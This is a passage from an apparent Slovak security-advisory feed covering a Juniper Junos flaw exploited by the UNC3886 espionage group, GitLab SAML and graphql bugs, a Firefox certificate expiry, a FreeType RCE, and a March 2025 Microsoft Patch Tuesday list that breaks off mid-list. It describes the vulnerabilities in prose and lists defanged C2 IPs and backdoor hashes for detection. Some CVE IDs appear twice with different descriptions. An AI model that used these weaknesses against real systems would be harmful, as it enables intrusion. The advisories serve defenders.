<p><strong>Pozn.: Zneužitie zraniteľnosti vyžaduje lokálny prístup k&nbsp;shell-u a&nbsp;nie je ju možné zneužiť prostredníctvom Junos CLI.</strong></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-21590 </strong>(CVSS 4.0 skóre: 6,7)</p>



<p>Nesprávne overovanie pôvodu súborov a nedostatočnú izoláciu procesov možno injekciou kódu do legitímnych procesov zneužiť na <strong>obídenie zabudovaného bezpečnostného mechanizmu Veriexec</strong>, ktorý na Junos OS umožňuje len spustenie kódu podpísaného výrobcom. CVE-2025-21590 by lokálny autentifikovaný útočník s&nbsp;prístupom k&nbsp;shell-u mohol zneužiť na <strong>vykonanie škodlivého kódu</strong> a&nbsp;<strong>kompromitáciu zariadenia</strong>.</p>



<p>Bezpečnostní výskumníci z Google Mandiant zverejnili informácie o aktivitách <a href="https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers">čínskej kyberspionážnej skupiny UNC3886</a>, ktorá sa dlhodobo zameriava na kompromitáciu virtualizačných platforiem a sieťových prvkov. Na prienik do systémom primárne zneužíva zero-day zraniteľnosti. <strong>UNC3886 v aktuálnej kampani na prvotný prienik do zariadení s Junos OS zneužívajú uniknuté prihlasovacie údaje a následne zraniteľnosť CVE-2025-21590 na vykonanie škodlivého kódu.</strong> Zariadenia sú infikované až 6 variantmi open-source backdooru TinyShell. Každý variant na maskovanie svojej činnosti používa iné C2 a inú metódu riadiacej komunikácie.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie bezpečnostného prvku</strong></li>



<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú aktualizáciu zraniteľných systémov s Junos OS na verzie 21.2R3-S9, 21.4R3-S10, 22.2R3-S6, 22.4R3-S6, 23.2R2-S3, 23.4R2-S4, 24.2R1-S2 alebo 24.2R2.</p>



<p>Spoločnosť Juniper po aktualizácii systémov odporúča vykonať Quick Scan a&nbsp;Integrity Scan zariadení prostredníctvom nástroja JMRT (Juniper Malware Removal Tool), do ktorého boli v&nbsp;súvislosti s&nbsp;aktívnym zneužitím tejto zraniteľnosti pridané špeciálne detekčné signatúry.</p>



<p>Taktiež odporúčame preveriť prítomnosť indikátorov kompromitácie v&nbsp;logoch sieťových a&nbsp;bezpečnostných prvkov.</p>



<p><strong>Indikátory kompromitácie:</strong></p>



<p><span style="text-decoration: underline;">IP adresy C2 serverov:</span></p>



<ul>
<li>8[.]222[.]225[.]8:22</li>



<li>45[.]77[.]39[.]28:22</li>



<li>101[.]100[.]182[.]122:22</li>



<li>116[.]88[.]34[.]184:22</li>



<li>118[.]189[.]188[.]122:22</li>



<li>129[.]126[.]109[.]50:22</li>



<li>158[.]140[.]135[.]244:22</li>



<li>223[.]25[.]78[.]136:22</li>
</ul>



<p><span style="text-decoration: underline;">SHA256 hashe backdoor malwaru:</span></p>



<ul>
<li>98380ec6bf4e03d3ff490cdc6c48c37714450930e4adf82e6e14d244d8373888</li>



<li>5bef7608d66112315eefff354dae42f49178b7498f994a728ae6203a8a59f5a2</li>



<li>c0ec15e08b4fb3730c5695fb7b4a6b85f7fe341282ad469e4e141c40ead310c3</li>



<li>5995aaff5a047565c0d7fe3c80fa354c40e7e8c3e7d4df292316c8472d4ac67a</li>



<li>905b18d5df58dd6c16930e318d9574a2ad793ec993ad2f68bca813574e3d854b</li>



<li>e1de05a2832437ab70d36c4c05b43c4a57f856289224bbd41182deea978400ed</li>



<li>3751997cfcb038e6b658e9180bc7cce28a3c25dbb892b661bcd1065723f11f7e</li>



<li>7ae38a27494dd6c1bc9ab3c02c3709282e0ebcf1e5fcf59a57dc3ae56cfd13b4</li>
</ul>



<p>YARA pravidlá pre host-based a&nbsp;Snort/Suricata pravidlá pre sieťovú detekciu môžete nájsť na <a href="https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers">webovej stránky Google Mandiant</a>.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://supportportal.juniper.net/JSA93446">https://supportportal.juniper.net/JSA93446</a></li>



<li><a href="https://supportportal.juniper.net/s/article/2025-03-Reference-Advisory-The-RedPenguin-Malware-Incident">https://supportportal.juniper.net/s/article/2025-03-Reference-Advisory-The-RedPenguin-Malware-Incident</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-21590">https://nvd.nist.gov/vuln/detail/CVE-2025-21590</a></li>



<li><a href="https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers">https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-targets-juniper-routers</a></li>



<li><a href="https://thehackernews.com/2025/03/chinese-hackers-breach-juniper-networks.html">https://thehackernews.com/2025/03/chinese-hackers-breach-juniper-networks.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2191/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v  GitLab možno zneužiť na impersonáciu používateľov a vykonanie kódu</title>
		<link>/posts/2189</link>
					<comments>/posts/2189#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 19 Mar 2025 15:54:54 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[access to sensitive information]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[GitLab]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2189</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/09/Gitlab-Logo-1024x577.png" alt="" /></p>Vývojári platformy GitLab vydali bezpečnostné aktualizácie, ktoré opravujú 9 zraniteľností, z čoho 3 sú označené ako kritické. CVE-2025-25291, CVE-2025-25292 v&#160;externej...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/09/Gitlab-Logo-1024x577.png" alt="" /></p>
<p><strong>Vývojári platformy GitLab vydali bezpečnostné aktualizácie, ktoré opravujú 9 zraniteľností, z čoho 3 sú označené ako kritické. CVE-2025-25291, CVE-2025-25292 v&nbsp;externej knižnici ruby-saml by vzdialený autentifikovaný útočník mohol zneužiť na impersonáciu ľubovoľných používateľov v rámci SAML IdP (Identity Provider) daného prostredia. CVE-2025-27407 v&nbsp;knižnici graphql možno zneužiť na vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>GitLab CE (Community Edition) a&nbsp;EE (Enterprise Edition) 17.9.X vo verziách starších ako 17.9.2</li>



<li>GitLab CE (Community Edition) a&nbsp;EE (Enterprise Edition) 17.8.X vo verziách starších ako 17.8.5</li>



<li>GitLab CE (Community Edition) a&nbsp;EE (Enterprise Edition) 17.7.X vo verziách starších ako 17.7.7</li>
</ul>



<p><strong>Pozn.: Zraniteľnosť je možné zneužiť len na inštanciách GitLab s&nbsp;aktívnou SAML SSO autentifikáciou.</strong></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-25291, CVE-2025-25292 </strong>(CVSS 4.0 skóre: 8,8)</p>



<p>Kritické zraniteľnosti s&nbsp;identifikátormi CVE-2025-25291 a CVE-2025-25292 sa nachádzajú v&nbsp;externej <strong>knižnici Ruby ruby-saml</strong>. Vzdialený autentifikovaný útočník disponujúci platným podpisom vytvoreným kľúčom používaným na validáciu odpovedí alebo tvrdení (eng. assertions) SAML by ich mohol zneužiť na <strong>prihlásenie sa pod účtom ľubovoľného používateľa v rámci SAML IdP daného prostredia</strong>.</p>



<p><strong>CVE-2025-27407 </strong>(CVSS 3.0 skóre: 9,8)</p>



<p>Zraniteľnosť v&nbsp;externej <strong>knižnici Ruby graphql</strong> by vzdialený autentifikovaný útočník počas prenosu špeciálne vytvoreného projektu mohol pomocou beta verzie funkcie Direct Transfer zneužiť na <strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong>Ostatné zraniteľnosti:</strong></p>



<p>Ostatné zraniteľnosti strednej závažnosti (CVE-2024-13054, CVE-2024-12380, CVE-2025-1257, CVE-2025-0652) a&nbsp;nízkej (CVE-2024-8402, CVE-2024-7296) možno zneužiť na vzdialené vykonanie kódu, zneprístupnenie služby, eskaláciu privilégií a získanie neoprávneného prístupu k citlivým údajom.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Neoprávnená zmena v&nbsp;systéme</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú aktualizáciu inštancií GitLab Community Edition a&nbsp;GitLab Enterprise Edition na verzie 17.9.2, 17.8.5, 17.7.7. V&nbsp;prípade, že aktualizáciu nie je možné vykonať, výrobca na mitigáciu kritických zraniteľností odporúča <a href="https://docs.gitlab.com/security/two_factor_authentication/#enforce-2fa-for-all-users">zaviesť dvojfaktorovú autentifikáciu</a> pre všetkých používateľov, <a href="https://docs.gitlab.com/integration/saml/#bypass-two-factor-authentication">zakázať obchádzanie dvojfaktorovej autentifikácie</a> na inštanciách autentifikáciou na báze SAML, <a href="http://docs.gitlab.com/administration/settings/import_and_export_settings/#enable-migration-of-groups-and-projects-by-direct-transfer">zakázať beta funkciu Direct Transfer</a> a&nbsp;<a href="https://docs.gitlab.com/integration/omniauth/#configure-common-settings">zaviesť schvaľovanie nových používateľov</a> zo strany administrátora.</p>



<p><strong>Zraniteľnosti v&nbsp;knižniciach programovacieho jazyka Ruby (ruby-saml, graphql) odhalili bezpečnostní výskumníci spoločnosti&nbsp;GitHub. V&nbsp;súvislosti s&nbsp;ich existenciou administrátorom a&nbsp;programátorom odporúčame uistiť sa, či nepoužívajú predmetné knižnice v&nbsp;rámci svojich systémov a&nbsp;služieb. V&nbsp;prípade, že áno, odporúčame vykonať bezodkladnú aktualizáciu ruby-saml na verziu 1.18.0 a&nbsp;graphql na verzie 1.11.8, 1.12.25, 1.13.24, 2.0.32, 2.1.14, 2.2.17 alebo 2.3.21.</strong></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://about.gitlab.com/releases/2025/03/12/patch-release-gitlab-17-9-2-released/">https://about.gitlab.com/releases/2025/03/12/patch-release-gitlab-17-9-2-released/</a></li>



<li><a href="https://github.blog/security/sign-in-as-anyone-bypassing-saml-sso-authentication-with-parser-differentials/">https://github.blog/security/sign-in-as-anyone-bypassing-saml-sso-authentication-with-parser-differentials/</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-25291">https://nvd.nist.gov/vuln/detail/CVE-2025-25291</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-25292">https://nvd.nist.gov/vuln/detail/CVE-2025-25292</a></li>



<li><a href="https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-4vc4-m8qh-g8jm">https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-4vc4-m8qh-g8jm</a></li>



<li><a href="https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-754f-8gm6-c4r2">https://github.com/SAML-Toolkits/ruby-saml/security/advisories/GHSA-754f-8gm6-c4r2</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-27407">https://nvd.nist.gov/vuln/detail/CVE-2025-27407</a></li>



<li><a href="https://github.com/rmosolgo/graphql-ruby/security/advisories/GHSA-q92j-grw3-h492">https://github.com/rmosolgo/graphql-ruby/security/advisories/GHSA-q92j-grw3-h492</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2189/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mozilla v súvislosti s vypršaním koreňového certifikátu vyzýva na aktualizáciu Firefox</title>
		<link>/posts/2187</link>
					<comments>/posts/2187#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 19 Mar 2025 15:53:04 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Firefox]]></category>
		<category><![CDATA[Mozilla]]></category>
		<guid isPermaLink="false">/?p=2187</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/03/Mozilla_Firefox_logo_2013.svg-min-1024x910.png" alt="" /></p>Spoločnosť Mozilla upozornila, že 14. marca 2025 vyprší jeden z koreňových certifikátov, ktorý je využívaný aj na overovanie a schvaľovanie...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/03/Mozilla_Firefox_logo_2013.svg-min-1024x910.png" alt="" /></p>
<p><strong>Spoločnosť Mozilla upozornila, že 14. marca 2025 vyprší jeden z koreňových certifikátov, ktorý je využívaný aj na overovanie a schvaľovanie doplnkov webového prehliadača Firefox a&nbsp;používateľov vyzvala vykonanie bezodkladnej aktualizácie systémov.</strong></p>



<p><strong>Prečo je aktualizácia dôležitá</strong><strong>?</strong></p>



<p>Koreňový certifikát je kľúčovým prvkom zabezpečenia Firefoxu, ktorý bráni neoprávneným zásahom a zaručuje dôveryhodnosť vydávaných balíčkov. Podľa upozornenia spoločnosti Mozilla neaktualizované systémy po 14. marci 2025 nebudú schopné využívať zásuvné moduly a niektoré pokročilé funkcie a budú vystavené aj ďalším bezpečnostným rizikám vyplývajúcich z&nbsp;používania neplatného certifikátu.</p>



<p><strong>Aké systémy vypršanie certifikátu ovplyvní?</strong></p>



<ul>
<li>Mozilla Firefox vo verziách starších ako 128</li>



<li>Mozilla Firefox ESR vo verziách starších ako ESR 115.13</li>
</ul>



<p><strong>Ako zistíte verziu svojho prehliadača Firefox?</strong></p>



<p>Ak chcete zistiť verziu nainštalovaného prehliadača Firefox, postupujte podľa týchto krokov:</p>



<ol>
<li>Otvorte prehliadač Firefox</li>



<li>Kliknite na tlačidlo „Ponuka“ (zvyčajne tri vodorovné čiary alebo bodky v pravom hornom rohu okna)</li>



<li>V ponuke vyberte možnosť „Pomocník“</li>



<li>Kliknite na „O prehliadači Firefox“</li>
</ol>



<p>Týmto postupom sa Vám zobrazí okno, v&nbsp;ktorom je uvedené číslo aktuálnej verzie prehliadača. Pri otvorení tohto okna Firefox automaticky skontroluje aj dostupnosť aktualizácií.</p>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom zasiahnutých systémov odporúčame vykonať bezodkladnú aktualizáciu webového prehliadača Firefox minimálne na verziu 128 a Firefox ESR minimálne na verziu 115.13. Aktuálne verzie prehliadačov sú 136 (rodina Firefox) a&nbsp;128.8 (rodina Firefox ESR). Zároveň odporúčame dbať na pravidelnú aktualizáciu všetkých používaných systémov a&nbsp;zariadení, ktorá je jedným zo základným pilierov kybernetickej hygieny a&nbsp;ochrany pre potenciálnymi hrozbami.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://blog.mozilla.org/addons/2025/03/10/root-certificate-will-expire-on-14-march-users-need-to-update-firefox-to-prevent-add-on-breakage/">https://blog.mozilla.org/addons/2025/03/10/root-certificate-will-expire-on-14-march-users-need-to-update-firefox-to-prevent-add-on-breakage/</a></li>



<li><a href="https://support.mozilla.org/en-US/kb/root-certificate-expiration">https://support.mozilla.org/en-US/kb/root-certificate-expiration</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2187/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zraniteľnosť v populárnej softvérovej knižnici FreeType</title>
		<link>/posts/2184</link>
					<comments>/posts/2184#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 19 Mar 2025 15:51:38 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Freetype]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2184</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/03/Freetype.png" alt="" /></p>Vývojári populárnej open-source softvérovej knižnice pre vykresľovanie fontov FreeType vydali bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú zraniteľnosť vysokej závažnosti. CVE-2025-27363...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/03/Freetype.png" alt="" /></p>
<p><strong>Vývojári populárnej open-source softvérovej knižnice pre vykresľovanie fontov FreeType vydali bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú zraniteľnosť vysokej závažnosti. CVE-2025-27363 by vzdialený neautentifikovaný útočník podvrhnutím špeciálne vytvorených súborov mohol zneužiť na vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Knižnica FreeType vo verziách starších ako 2.13.0 (vrátane)</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-27363 </strong>(CVSS 3.1 skóre: 8,1)</p>



<p>Zraniteľnosť spočíva v nesprávnom parsovaní tzv. font subglyph štruktúr. Vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvorených TrueType GX a súborov fontov mohol zneužiť na zápis mimo povolených hodnôt pamäte. To mu môže dovoliť <strong>vzdialene vykonať kód </strong>a&nbsp;<strong>získanie kontroly nad systémom</strong>.</p>



<p><strong>Podľa bezpečnostných výskumníkov z&nbsp;Facebook je zraniteľnosť v&nbsp;súčasnosti aktívne zneužívaná útočníkmi. Bližšie informácie o spôsobe a rozsahu jej zneužitia neboli zatiaľ zverejnené.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Narušenie dôvernosti, integrity a&nbsp;dostupnosti systému</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a programátorom odporúčame uistiť sa, či nepoužívajú predmetnú knižnicu v&nbsp;rámci svojich produktov a&nbsp;služieb. V&nbsp;prípade, že áno, odporúčame vykonať bezodkladnú aktualizáciu knižnice FreeType na verziu 2.13.3.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-27363">https://nvd.nist.gov/vuln/detail/CVE-2025-27363</a></li>



<li><a href="https://www.facebook.com/security/advisories/cve-2025-27363">https://www.facebook.com/security/advisories/cve-2025-27363</a></li>



<li><a href="https://sensorstechforum.com/cve-2025-27363-freetype-meta-vulnerability/">https://sensorstechforum.com/cve-2025-27363-freetype-meta-vulnerability/</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/facebook-discloses-freetype-2-flaw-exploited-in-attacks">https://www.bleepingcomputer.com/news/security/facebook-discloses-freetype-2-flaw-exploited-in-attacks</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2184/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft v rámci marcového Patch Tuesday opravil 6 kritických zraniteľností</title>
		<link>/posts/2182</link>
					<comments>/posts/2182#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 19 Mar 2025 15:47:39 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[access to sensitive information]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Patch Tuesday]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Spoofing]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">/?p=2182</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>Spoločnosť Microsoft vydala v marci 2025 balík opráv pre portfólio svojich produktov opravujúci 58 zraniteľností, z&#160;ktorých 23 umožňuje vzdialené vykonanie...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/MicrosoftLogo-4238232498.jpg" alt="" /></p>
<p><strong>Spoločnosť Microsoft vydala v marci 2025 balík opráv pre portfólio svojich produktov opravujúci 58 zraniteľností, z&nbsp;ktorých 23 umožňuje vzdialené vykonanie kódu. Kritické zraniteľnosti nachádzajúce sa v&nbsp;produktoch Microsoft Office a Microsoft Dataverse a&nbsp;komponentoch Windows Remote Desktop Services, Remote Desktop Client, Windows Domain Name Service a Windows Subsystem for Linux (WSL2) možno zneužiť na eskaláciu privilégií a vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>ASP.NET Core 8.0</li>



<li>ASP.NET Core 9.0</li>



<li>Azure ARC</li>



<li>Azure Agent for Backup</li>



<li>Azure Agent for Site Recovery</li>



<li>Azure CLI</li>



<li>Azure promptflow-core</li>



<li>Azure promptflow-tools</li>



<li>Microsoft 365 Apps for Enterprise for 32-bit Systems</li>



<li>Microsoft 365 Apps for Enterprise for 64-bit Systems</li>



<li>Microsoft Access 2016 (32-bit edition)</li>



<li>Microsoft Access 2016 (64-bit edition)</li>



<li>Microsoft Dataverse</li>



<li>Microsoft Excel 2016 (32-bit edition)</li>



<li>Microsoft Excel 2016 (64-bit edition)</li>



<li>Microsoft Office 2016 (32-bit edition)</li>



<li>Microsoft Office 2016 (64-bit edition)</li>



<li>Microsoft Office 2019 for 32-bit editions</li>



<li>Microsoft Office 2019 for 64-bit editions</li>



<li>Microsoft Office LTSC 2021 for 32-bit editions</li>



<li>Microsoft Office LTSC 2021 for 64-bit editions</li>



<li>Microsoft Office LTSC 2024 for 32-bit editions</li>



<li>Microsoft Office LTSC 2024 for 64-bit editions</li>



<li>Microsoft Office LTSC for Mac 2021</li>



<li>Microsoft Office LTSC for Mac 2024</li>



<li>Microsoft Visual Studio 2017 version 15.9 (includes 15.0 &#8211; 15.8)</li>



<li>Microsoft Visual Studio 2019 version 16.11 (includes 16.0 &#8211; 16.10)</li>



<li>Microsoft Visual Studio 2022 version 17.10</li>



<li>Microsoft Visual Studio 2022 version 17.12</li>



<li>Microsoft Visual Studio 2022 version 17.13</li>



<li>Microsoft Visual Studio 2022 version 17.8</li>



<li>Microsoft Word 2016 (32-bit edition)</li>



<li>Microsoft Word 2016 (64-bit edition)</li>



<li>Office Online Server</li>



<li>Remote Desktop client for Windows Desktop</li>



<li>Visual Studio Code</li>



<li>WinDbg</li>



<li>Windows 10 Version 1607 for 32-bit Systems</li>



<li>Windows 10 Version 1607 for x64-based Systems</li>



<li>Windows 10 Version 1809 for 32-bit Systems</li>



<li>Windows 10 Version 1809 for x64-based Systems</li>



<li>Windows 10 Version 21H2 for 32-bit Systems</li>



<li>Windows 10 Version 21H2 for ARM64-based Systems</li>



<li>Windows 10 Version 21H2 for x64-based Systems</li>



<li>Windows 10 Version 22H2 for 32-bit Systems</li>



<li>Windows 10 Version 22H2 for ARM64-based Systems</li>



<li>Windows 10 Version 22H2 for x64-based Systems</li>



<li>Windows 10 for 32-bit Systems</li>



<li>Windows 10 for x64-based Systems</li>



<li>Windows 11 Version 22H2 for ARM64-based Systems</li>



<li>Windows 11 Version 22H2 for x64-based Systems</li>



<li>Windows 11 Version 23H2 for ARM64-based Systems</li>



<li>Windows 11 Version 23H2 for x64-based Systems</li>



<li>Windows 11 Version 24H2 for ARM64-based Systems</li>



<li>Windows 11 Version 24H2 for x64-based Systems</li>



<li>Windows App Client for Windows Desktop</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1</li>



<li>Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2</li>



<li>Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2</li>



<li>Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)</li>



<li>Windows Server 2012</li>



<li>Windows Server 2012 (Server Core installation)</li>



<li>Windows Server 2012 R2</li>



<li>Windows Server 2012 R2 (Server Core installation)</li>



<li>Windows Server 2016</li>



<li>Windows Server 2016 (Server Core installation)</li>



<li>Windows Server 2019</li>



<li>Windows Server 2019 (Server Core installation)</li>



<li>Windows Server 2022</li>



<li>Windows Server 2022 (Server Core installation)</li>



<li>Windows Server 2022, 23H2 Edition (Server Core installation)</li>



<li>Windows Server 2025</li>



<li>Windows Server 2025 (Server Core installation)</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p>     <strong>I. Kritické zraniteľnosti:</strong></p>



<p><strong>CVE-2025-24053 </strong>(CVSS skóre 7,2)</p>



<p>Zraniteľnosť v&nbsp;produkte <strong>Microsoft Dataverse</strong> spočíva v&nbsp;nesprávnej autorizácii a&nbsp;vzdialený autentifikovaný útočník by ju mohol zneužiť na <strong>eskaláciu privilégií.</strong> Zraniteľnosť bola automaticky opravená spoločnosťou Microsoft a nevyžaduje dodatočnú aktualizáciu systémov.</p>



<p><strong>CVE-2025-24035, CVE-2025-24045  </strong>(CVSS skóre 8,1)</p>



<p><strong>Windows Remote Desktop Services</strong> obsahuje zraniteľnosti spočívajúce v&nbsp;ukladaní citlivých údajov v&nbsp;nesprávne uzamknutej pamäti. Vzdialený neautentifikovaný útočník by ich mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>. Úspešné zneužitie zraniteľnosti <strong>vyžaduje, aby útočník vyhral súbeh procesov</strong>.</p>



<p><strong>CVE-2025-26645 </strong>(CVSS skóre 8,8)</p>



<p>Zraniteľnosť v&nbsp;komponente <strong>Remote Desktop Client</strong> spočíva v&nbsp;nesprávnom riadení prístupu a&nbsp;možno ju zneužiť na <strong>vzdialené vykonanie kódu</strong>. Zneužitie zraniteľnosti <strong>vyžaduje interakciu zo strany používateľa s&nbsp;oprávneniami administrátora</strong>, ktorý sa musí pripojiť na RDP server pod kontrolou útočníka.</p>



<p><strong>CVE-2025-24084 </strong>(CVSS skóre 8,4)</p>



<p>Dereferenciu nedôveryhodných ukazovateľov v&nbsp;rámci komponentu <strong>Windows Subsystem for Linux (WSL2) Kernel</strong> by vzdialený neautentifikovaný útočník mohol zneužiť na <strong>vzdialené vykonanie kódu</strong> zaslaním špeciálne vytvoreného odkazu v&nbsp;rámci e-mailovej správy alebo inej komunikačnej platformy. Zraniteľnosť možno za bližšie nešpecifikovaných podmienok <strong>zneužiť len doručením e-mailu a&nbsp;bez interakcie zo strany používateľa</strong>.</p>



<p><strong>CVE-2025-24057 </strong>(CVSS skóre 7,8)</p>



<p>Kritická zraniteľnosť v <strong>Microsoft Office</strong> spočíva v&nbsp;pretečení medzipamäte haldy a&nbsp;vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvorených súborov mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>. Zneužitie zraniteľnosti <strong>vyžaduje interakciu zo strany používateľa</strong>, ktorý musí stiahnuť a&nbsp;otvoriť špeciálne vytvorený súbor.</p>



<p><strong>CVE-2025-24057 </strong>(CVSS skóre 7,8)</p>



<p>Použitie odalokovaného miesta v&nbsp;pamäti v&nbsp;rámci <strong>Windows Domain Name Service</strong> by vzdialený neautentifikovaný útočník zaslaním presne načasovanej dynamickej DNS Update správy mohol zneužiť na <strong>vzdialené vykonanie kódu</strong>. Zneužitie zraniteľnosti <strong>vyžaduje, aby útočník vyhral súbeh procesov</strong>.</p>



<p><strong>     II. Aktívne zneužívané zraniteľnosti:</strong></p>



<p><strong>CVE-2025-24983 </strong>(CVSS skóre 7,0)</p>



<p>Použitie odalokovaného miesta v&nbsp;pamäti v&nbsp;rámci <strong>Windows Win32 Kernel Subsystem</strong> by lokálny autentifikovaný útočník mohol zneužiť na <strong>eskaláciu privilégií na úroveň oprávnení SYSTEM</strong>. Zneužitie zraniteľnosti <strong>vyžaduje, aby útočník vyhral súbeh procesov</strong>.</p>



<p><strong>Pozn.: Podľa spoločnosti ESET je predmetná zraniteľnosť aktívne zneužívaná útočníkmi na šírenie malvéru PIPEMAGIC minimálne od marca 2023.</strong></p>



<p><strong>CVE-2025-24983 </strong>(CVSS skóre 7,0)</p>



<p>Nesprávnu neutralizáciu v rámci <strong>Microsoft Management Console</strong> by vzdialený neautentifikovaný útočník mohol zneužiť na <strong>obídenie bezpečnostných mechanizmov</strong>. Zneužitie zraniteľnosti <strong>vyžaduje interakciu zo strany používateľa</strong>, ktorý musí otvoriť špeciálne vytvorený súbor.</p>



<p><strong>CVE-2025-24984 </strong>(CVSS skóre 4,6)</p>



<p>Prítomnosť citlivých údajov v&nbsp;logoch <strong>Windows NTFS</strong> by útočník s&nbsp;fyzickým prístupom k&nbsp;zariadeniu mohol zneužiť na <strong>získanie neoprávneného prístupu k&nbsp;citlivým údajom</strong>. Zneužitie zraniteľnosti <strong>vyžaduje fyzický prístup</strong> k&nbsp;zariadeniu umožňujúci pripojenie USB kľúča.</p>



<p><strong>CVE-2025-24991 </strong>(CVSS skóre 5,5); <strong>CVE-2025-24993 </strong>(CVSS skóre 7,8)</p>



